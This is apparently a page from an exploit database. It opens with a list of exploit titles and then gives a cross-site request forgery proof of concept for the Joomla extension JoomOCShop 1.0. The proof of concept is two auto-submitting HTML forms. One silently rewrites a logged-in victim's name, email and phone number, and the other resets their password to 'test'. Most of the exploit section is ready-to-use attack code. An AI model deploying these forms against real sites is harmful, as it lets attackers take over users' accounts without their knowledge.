
11 changes to exploits/shellcodes ALFTP 5.31 - Local Buffer Overflow (SEH Bypass) CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass DomainMod 4.09.03 - 'oid' Cross-Site Scripting DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting Wordpress Plugin Events Calendar - SQL Injection Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery wityCMS 0.6.1 - Cross-Site Scripting Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)
40 lines
No EOL
1.4 KiB
HTML
40 lines
No EOL
1.4 KiB
HTML
# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross site request forgery
|
|
# Date: 2018-05-28
|
|
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
|
|
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/
|
|
# Vendor Homepage: https://www.joomlaextensions.co.in/
|
|
# Version: 1.0
|
|
# Tested on: Kali linux
|
|
===================================================
|
|
|
|
# POC :
|
|
|
|
# Change user information exploit :
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://site.com/joomoc2/?route=account/edit" method="POST" enctype="multipart/form-data">
|
|
<input type="hidden" name="firstname" value="decode" />
|
|
<input type="hidden" name="lastname" value="revenge" />
|
|
<input type="hidden" name="email" value="decod3.n@gmail.com" />
|
|
<input type="hidden" name="telephone" value="100000" />
|
|
<input type="hidden" name="fax" value=" " />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
# Change password exploit :
|
|
|
|
<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
|
|
<input type="hidden" name="password" value="test" />
|
|
<input type="hidden" name="confirm" value="test" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
|
|
==================================================== |